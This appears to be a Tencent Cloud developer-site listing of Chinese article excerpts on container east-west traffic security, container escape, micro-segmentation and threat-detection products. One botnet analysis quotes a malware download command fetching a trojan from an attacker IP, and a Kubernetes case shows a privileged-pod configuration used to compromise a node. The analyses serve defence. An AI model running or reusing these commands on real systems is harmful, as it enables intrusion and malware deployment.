- 综合排序
- 最热优先
- 最新优先
容器“东西向”攻击猛如虎?腾讯云容器安全服务 2025 版给出 4 步解法
容器东西向流量占比已超 85%,传统防火墙束手无策。本文基于腾讯云容器安全服务(TCSS),拆解攻击链、给出 4 步落地清单,帮你在 10 分钟内完成防护闭环。 一、东西向攻击为何成为 2025 年云原生“头号杀手”?流量占比高:KubeCon 2025 报告显示,K8s 集群内 87% 的流量为东西向,传统南北向防火墙 90% 规则失效。 横向移动快:攻击者利用合法服务账户(ServiceAccount)JWT,平均 4 分 12 秒即可完成横向跳跃。 一句话:看不见、拦不住、追不上,是东西向攻击的“三板斧”。 全过程 10 分钟,0 行代码,即可让东西向攻击“看得见、拦得住、追得回”。五、结语容器东西向安全已从“可选项”变为“必答题”。
30910编辑于 2025-10-10- 来自专栏云鼎实验室的专栏
容器安全在野攻击调查
黑产在容器安全攻击过程中使用了越来越多的高级技术,包括:无文件攻击、二进制打包、rootkit。 攻击强度,攻击数量,攻击方法多样性有显著增长,这与容器应用规模增长有关系。 容器安全面临的安全挑战越来越大,需要选择靠谱的安全产品进行防护。 黑产云原生攻击动机 在云原生架构中,容器生命周期短、业务复杂。 传统的木马已不太适合云原生架构,攻击者无法获取批量的容器进行DDoS。 云原生攻击中绝大部分是利用容器集群挖矿,已经形成了稳定的黑产收益链条,是黑产的主要攻击动机。 可以看出来,49%的攻击最多持续4天,能持续一周以上的占38%,能持续超过一个月的占17%。大约40%的容器使用单位对于容器的攻击没有任何防御能力,无法及时有效的发现和处置入侵至容器集群中的风险。 注:本文是基于容器蜜罐攻击检测系统和dockerhub 100多万的镜像分析总结。 更多细节内容,可点击“阅读原文”下载《容器安全在野攻击调查》进行了解。
89440编辑于 2022-03-10 - 来自专栏SDNLAB
SDN控制平面东西向现状简介
由于单控制器能力有限,为满足大规模和可拓展性要求,东西向接口的研究成为下一个SDN研究领域。目前对于SDN东西向接口的研究还处于初级阶段,还缺少行业标准。 标准的SDN东西向接口应与SDN控制器解耦,能实现不同厂家控制器之间通信。 关于东西向接口的标准,目前在业界中还未得到重视,仅ONF一个项目组在关注这个方向。 论文中介绍了他们设计的东西向接口的功能,并完成了部署和测试。 SDNi是华为提出的一种SDN东西向的实现,目前已经在OpenDayLight中部署实现。 在很久以前发布了关于跨域通信的报告,提出了基于BGP或者SIP协议去完成SDN东西向接口的想法,然而笔者并没有搜集到相关的实践部署。 目前笔者正在研究SDN东西向的内容,期待后续能有所产出。
1.5K70发布于 2018-04-03 - 来自专栏RASP社区
RASP技术进阶系列(二):东西向Web流量智能检测防御
常规纵深防御有以下三处短板:1)应用漏洞止步于漏扫,缺乏漏洞及时修复和0day漏洞免疫的机制;2)东西向流量检测交由主机EDR和容器安全产品的微隔离技术,对于微服务间RPC协议及加密流量内容无法监测,并且无法追踪其在程序内的真实行为 图片在以往传统纵深防御体系里,通过EDR主机微隔离技术来跟踪描绘主机之间的流量访问关系如下图所示:图片随着容器化架构的普及,南北向流量和东西向流量新增了应用容器间的访问场景,如下:图片但从入侵风险真实性判断和执行操作完整性审查的角度看 ,主机和容器间的流量监控还无法分析到具体应用程序解析请求后的真实执行情况。 RASP技术则很好地补充了对应用容器内部程序间的流量访问和程序内部上下文执行过程的监控信息。 :以微服务架构作为基础,除了对应用间流量和东西向流量描绘,更能深入呈现应用程序内部具体执行操作,为安全运营提供从网络层到应用内部真实执行过程数据,分析攻击链路。
1.3K30编辑于 2023-04-23 - 来自专栏腾讯安全
腾讯安全发布《容器安全在野攻击调查》
3月8日,腾讯安全发布《容器安全在野攻击调查》(以下简称《调查》),通过对一段时间内在野的容器攻击进行统计和分析,对攻击者的战术、技术、流程、活动周期、攻击复杂度进行解析,帮助企业安全运维部门了解容器安全特性 《调查》报告指出,黑产组织在容器安全攻击过程中使用了越来越多的高级技术,包括无文件攻击、二进制打包、rootkit等,攻击强度,攻击数量,攻击方法多样性有显著增长,这与容器应用规模增长有关系。 然而,容器及应用数量的增加同时也伴随着安全复杂性的增加,在生产环境中保证容器安全成为了一个极具挑战性的任务。 此次发布的《容器安全在野攻击调查》,分析数据基于腾讯安全云鼎实验室的哨兵蜜罐捕获的2021年9月至2022年1月总共5个月的攻击数据,总计125,364次攻击,并通过腾讯安全云鼎实验室的容器沙箱运行分析的 Dockerhub中1093980个镜像数据,从攻击者视角出发探索容器安全的有效防护,相信能为企业容器安全运维提供借鉴。
97520编辑于 2022-03-10 - 来自专栏云鼎实验室的专栏
再次捕获云上在野容器攻击,TeamTNT黑产攻击方法揭秘
黑客团队新型在野容器攻击活动,相比之前TeamTNT挖矿木马,此次新型攻击手法对原挖矿木马进行了升级,并利用容器环境进行感染传播。 本文将会使用ATT&CK矩阵溯源分析样本在入侵、持久化、容器逃逸等完整攻击路径,为大家清晰还原黑客攻击手法和全貌。 三、样本att&ck矩阵分析 TEAMTNT的新样本通过docker remote API传播,过程中使用了 特权容器,容器逃逸,LKM rootkit 等先进攻击方式,下面是对于整个攻击过程的ATT& 下图为攻击流程,我们将整个过程分为五个部分讲解:1、初始化访问与对外扫描 2、执行3、权限提升-容器逃逸 4、攻击持久化 5、防御绕过 3.1 攻击向量-初始访问与横向扫描—Remote API 容器安全服务已集成腾讯云鼎实验室最新容器安全情报,可第一时间检测黑产容器镜像,并针对新型在野攻击进行有效防御,企业可通过容器安全服务及时发现容器安全风险并快速构建容器安全防护体系。
1.9K20发布于 2021-10-20 - 来自专栏FreeBuf
为什么说不要用VLAN、VPC解决东西向隔离问题
从攻击防御角度: 从近年来的安全事件我们可以看到,攻击者从以破坏为主的攻击逐渐转变为以特定的政治或经济目的为主的高级可持续攻击。 根据以上特点,结合等保2.0中虚拟机之间访问控制,内部攻击检测、阻断等要求,东西向的隔离应该具备以下能力: 东西向隔离应该具备的能力 1、识别内部业务的访问关系。 东西向不易管理,很大程度上是因为内部流量不可见,从而导致安全策略设计、调整困难。能够识别主机(包括容器)之间的流量,包括访问的服务、端口、次数,甚至是进程等。 2、能够实现端到端隔离。 具备物理服务器之间、虚拟机之间、容器之间的访问控制能力,控制粒度为端口级。 3、能够下降内部主机的攻击面。可以设置访问来源、及其可以访问的服务和端口;具备网络层面关闭端口的能力。 ),并对东西向流量进行可视化管理。
2.9K30发布于 2018-12-19 如何防止容器逃逸攻击?腾讯云容器安全深度解析与实战指南
随着容器化技术普及,容器逃逸攻击已成为云原生环境的核心威胁。 本文基于腾讯云容器安全服务(TCSS)的能力,系统阐述容器逃逸攻击的防御策略,通过技术解析与实战案例结合的方式,为企业提供可落地的安全建设方案。 一、容器逃逸攻击:云原生时代的隐形杀手容器逃逸攻击是指攻击者通过漏洞利用或配置缺陷,突破容器沙箱限制,获取宿主机权限的恶性行为。 典型攻击路径包括: 内核漏洞利用:如Dirty Cow、Dirty Pipe等Linux内核提权漏洞 配置错误:共享PID命名空间、挂载敏感目录等不当配置 应用层渗透:通过容器内Web应用漏洞反向控制宿主机 限制容器特权模式 设置文件读写白名单 基线治理 导入CIS Kubernetes Benchmark模板 自动修复高风险配置项 周期性合规巡检 应急演练 模拟容器逃逸攻击场景 测试日志溯源完整性
45610编辑于 2025-09-29- 来自专栏用户8411301的专栏
云原生时代,如何确保容器的全生命周期安全?
2、容器技术风险:容器隔离依赖于 Linux 内核 namespaces 和 cgroups 等特性,从攻击者的角度出发,可以利用内核系统漏洞,容器运行时组件和容器应用部署配置等多个维度发起针对性的逃逸和越权攻击 3、东西向流量防护:传统的企业应用安全模型通常基于内部架构不同的信任域来划分对应的安全边界,在信任域内的东西向服务交互被认为是安全的。 ,攻击同主机或不同主机上的其他容器,也就是常提到的“东西向攻击”,甚至有可能形成拒绝服务攻击。 运行时安全:将已知攻击手段加入容器行为黑名单,建立默认防护规则。并在CI\CD过程中,通过自学习形成容器行为基线,并生产环境进行防护,拦截基线以外的系统调用、可执行文件的执行。 实现东西向流量可视化,识别网络连接安全风险,提供完备的容器网络微隔离方案。
1K31发布于 2021-07-13 云原生时代,全流量检测与响应产品如何选?2026年主流方案深度解析
面对APT攻击、0day漏洞、加密Webshell等高级威胁,传统的边界防御已力不从心。 云原生架构的普及,使得企业网络流量呈现南北向与东西向交织的复杂态势,全流量检测与响应(NDR)成为构建主动防御体系的关键。 它能够实时发现恶意攻击和潜在威胁,并协助进行事件分析、溯源和阻断。在微服务、容器化及DevOps实践中,NDR是实现网络可视化、消除监测盲区、保障业务连续性的基石。 原生化集成,部署极简;按需付费,无前期投入;支持私网东西向流量检测。 纯公有云环境,追求快速上线的用户。 SaaS订阅模式 奇安信天眼 全流量威胁检测与响应;AI驱动威胁狩猎;攻击链还原。 全流量可视与秒级响应闭环:系统提供对互联网出口、负载均衡、NAT网关等南北向流量,以及子网内、容器间东西向流量的全面检测能力,彻底消除盲区。
20110编辑于 2026-02-27- 来自专栏FreeBuf
Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器
一、背景 Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。 此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。 二、详细分析 在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。 确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7 获取容器列表: ? 针对运行状态的容器利用Docker EXEC执行木马下载命令: wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7 ?
1.2K41发布于 2020-10-27 - 来自专栏腾讯安全
你的服务器都是怎么被拿下的?|攻防演练真实案例
主机安全“WeDetect引擎”支持南北向、东西向的攻击流量检测,可以自动化结合入侵事件产生的多维度数据,自动化完成对攻击事件的关联、分析、实锤,减少无效告警、发现有效安全事件。 首先,开启RASP+精准漏洞防御,可以为服务器注射一剂疫苗,在不影响业务的情况下,对东西向流量、变形流量等传统网络安全产品难以防范的攻击进行拦截,为漏洞维修争取时间。 图片秘籍三:部署高级防御能力,并做好容器内安全防护,照亮隐秘的角落为了持久化渗透目标内网,攻击者会利用各种隐秘的后门技术来进行长久的权限维持并进行痕迹清理。 同时,主机安全容器版可以支持容器环境下从镜像构建到容器运行时全生命周期的安全风险,让容器资产不再成为防护盲区。 企业可以借助主机安全、容器安全能力筑牢服务器最后一道安全防线,同时联动腾讯云防火墙、WAF、云安全中心,构建“3+1”安全防护体系,实现从互联网流量边界、Web服务,再到工作负载层的全方位防护,全面提升数字安全免疫力
1K40编辑于 2023-07-07 - 来自专栏科技云报道
做零信任,微隔离是认真的
随着内部网络的架构从传统的IT架构向虚拟化、混合云和容器化升级变迁,企业发现一旦边界的防线被攻破或者绕过,攻击者就可以在数据中心内部横向移动,内部隔离不再是一件容易的事情。 简单而言,微隔离能够应对传统环境、虚拟化环境、混合云环境、容器环境下,对于东西向流量隔离的需求,重点用于阻止攻击者进入企业数据中心网络内部后的横向移动。 其中,SDP技术是用于实现南北向安全的(用户跟服务器间的安全),微隔离技术是用于实现东西向安全的(服务器跟服务器间的安全),IAM技术用于资源之间彼此的访问关系授权。 但劣势在于只支持自身虚拟化平台、不支持混合云;更适合于隔离,而不是访问控制;东西向的管理能力有限。 第三方防火墙 主要是基于第三方防火墙供应商提供的虚拟化防火墙。 ,能够触达内部其他多少个容器工作负载;能否通过该容器渗透到宿主主机; 以上所有网络访问行为是否在微隔离系统中的策略智能管控平台上监测到,是否有明显报警标记。
87930编辑于 2022-04-16 腾讯云WAF vs 云防火墙:企业网络安全该如何选择?
防护对象 网站、Web API、小程序等Web业务 云主机、容器 、VPC网络等基础设施 典型威胁 SQL注入/XSS攻击/CC攻击/Bot爬虫等 DDoS攻击/端口扫描/非法入侵/东西向流量威胁 部署方式 DNS引流/SaaS化部署/负载均衡型 API经济 API资产自动发现/敏感数据脱敏/异常调用拦截 容器集群南北向流量防护 : 若核心业务聚焦Web应用且存在多云/混合云架构,WAF的跨平台防护能力(支持非腾讯云服务器)与智能限流技术将成为刚需; 当业务涉及云主机集群或VPC内网安全时,云防火墙的失陷主机自动阻断、东西向流量管控等特性则不可或缺
40910编辑于 2025-11-12容器化技术与安全沙箱如何构建云计算安全新范式?
某电商平台容器化后资源利用率提升 40%,但随之而来的安全风险呈指数级增长:2023 年容器逃逸攻击事件较上年增长 180%,某金融企业因容器镜像漏洞导致数据泄露,损失超 2000 万元。 FinClip 容器化平台通过引入硬件级隔离技术,从底层增强容器间的资源隔离,有效抵御此类漏洞攻击。· 镜像安全风险如何体现? FinClip 提供的镜像安全扫描服务,结合沙箱环境模拟镜像运行,可检测出传统工具漏检的供应链攻击漏洞,漏检率降低至 5% 以下。· 东西向流量为何失控? :Kubernetes 集群内容器间日均交互达百万次,东西向攻击流量占比超 70%,传统安全组策略难以有效管控。 Kata 容器通过轻量级虚拟机实现容器间硬件资源隔离,对比传统 Docker 容器:· 内存隔离精度从进程级提升至虚拟机级,某内存溢出攻击场景中,相邻容器资源侵占率从 90% 降至 3%。
41210编辑于 2025-07-08国际主流网络威胁检测产品全景解析:腾讯云NDR如何引领智能防御新方向?
在数字化转型加速的今天,网络攻击手段日益复杂,企业对威胁检测的需求已从“被动防御”转向“主动智能”。2026年,全球网络威胁检测市场规模突破300亿元,AI技术与云原生架构的深度融合成为行业新趋势。 AI深度赋能,检测更精准 四重检测引擎:结合机器学习、行为分析、威胁情报(覆盖2000+ CVE漏洞)及哈勃沙箱动态分析,识别传统手段难以发现的加密Webshell、0day攻击。 全流量可视,消除监测盲区 东西向流量解析:覆盖云上南北向、容器间及VPC内部流量,支持4-7层协议全量留存,还原攻击全链路。 三、选型建议:腾讯云NDR的典型应用场景 云原生环境:适合已上云或混合云架构企业,解决传统安全工具无法覆盖的东西向流量盲区。 四、结语 面对APT攻击、勒索软件等新型威胁,企业需构建“检测-响应-溯源”闭环能力。腾讯云NDR凭借云原生架构、AI智能分析及全流量可视能力,为企业提供了从边界防护到内网治理的全栈解决方案。
18210编辑于 2026-02-25- 来自专栏云防火墙
【版本升级】腾讯云防火墙3.1.0版本正式发布
随着科技的发展,传统的边界防护展现出局限性,从内外网边界到主机边界、再到容器之间,网络边界的概念逐渐模糊;另一方面,疫情居家办公也给企业带来了新风险:员工使用私人设备连接企业资源和网络,可能成为边界防御的突破口 日志.png 二、VPC间防火墙 漏洞执行后,攻击者往往通过横向扩散感染更多主机使利益最大化,新形势对东西向流量的管控产生进一步需求。 (CVE-2019-2725)入侵,攻击得手后会继续通过SSH弱口令、Redis未授权访问漏洞、ActiveMQ未授权访问漏洞横向移动,以尽可能入侵控制更多主机,组建僵尸网络挖矿。 在3.1版本的VPC间防火墙支持IPS入侵防御,增加横向移动检测防线,进一步强化内网安全性,通过以下三种模式管理东西向流量: 观察模式:基础防御、虚拟补丁均为检测模式,针对发现的恶意访问或网络攻击行为, 只告警,不自动阻断连接 拦截模式:自动拦截高置信度规则检出的网络攻击/恶意访问 严格模式:基础防御、虚拟补丁均为全局拦截模式,针对任何检测到的告警,自动阻断连接,可能产生误报,适用于重保/攻防场景.
1.9K41编辑于 2022-04-15 - 来自专栏前沿安全技术
CapSpeaker:基于电容器的麦克风声音注入攻击
为了使攻击可行,必须通过平衡电容器的频率响应和麦克风的峰值非线性之间的权衡来仔细选择载波频率,将载波频率的选择建模为优化问题。 4.2 制作攻击信号 信号处理模块解决了两个问题: 1) 选择合适的载波频率进行调制,使攻击信号听不见,但与电容器的频率响应相匹配。 表示载波频率,需要考虑的因素包括电容器的频率响应、麦克风的非线性特性和攻击的听不见性。 当电容器可以发出更强的声音时,例如使用更高的功率负载,可以成功攻击更多的设备。 在智能 LED 灯上实施 CapSpeaker 攻击,并通过各种语音命令、接收设备、环境噪声水平以及电容器与接收器之间的距离来评估 CapSpeaker 攻击的性能。
1.8K31编辑于 2023-03-13 - 来自专栏Bypass
K8s攻击案例:Privileged特权容器导致节点沦陷
01、概述 特权容器(Privileged Container)是一种比较特殊的容器,在K8s中运行特权容器,需要将 Privileged 设为 true ,容器可以执行几乎所有可以直接在主机上执行的操作 基于此,利用容器的特权配置可以获取容器所在节点的权限,甚至从节点权限提升至集群管理员权限。 02、攻击场景 编写yaml文件,在securityContext中加入参数,将privileged设置为true,使用特权模式运行Pod。 name: pod1 command: ['/bin/sh','-c','sleep 24h'] securityContext: privileged: true 02、攻击过程 下载kubecrl命令行工具, 收集信息为进一步攻击K8s集群提供必要的条件。
1.8K10编辑于 2023-12-24 全面解析:哪些网络威胁检测工具能实现南北向与东西向流量关联分析?
传统以南北向流量(外部访问内部)为主的防护模式已无法应对现代威胁,东西向流量(内部服务间通信)的激增带来了新的安全挑战。 一、南北向与东西向流量:现代网络安全的双重挑战 南北向流量指进出数据中心的纵向流量,如用户访问Web应用、API调用等;东西向流量则是数据中心内部的横向流量,如微服务间通信、数据库访问等。 随着分布式架构的普及,东西向流量占比已远超南北向流量,攻击者常利用内部横向移动实施高级持续性威胁(APT)攻击。因此,能够同时监控并关联分析这两种流量的检测工具成为企业安全建设的刚需。 、专项攻击告警降噪75% 大型企业、数据中心、云环境 三、腾讯云NDR:一体化威胁检测解决方案 腾讯云网络威胁检测系统(NDR,又称腾讯御界)是一款集威胁检测、分析、溯源和阻断于一体的解决方案。 秒级响应:结合腾讯天幕旁路阻断能力,实现秒级实时攻击拦截,支持IPv4/IPv6场景及基于IP/URL的阻断。
23110编辑于 2026-02-26
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号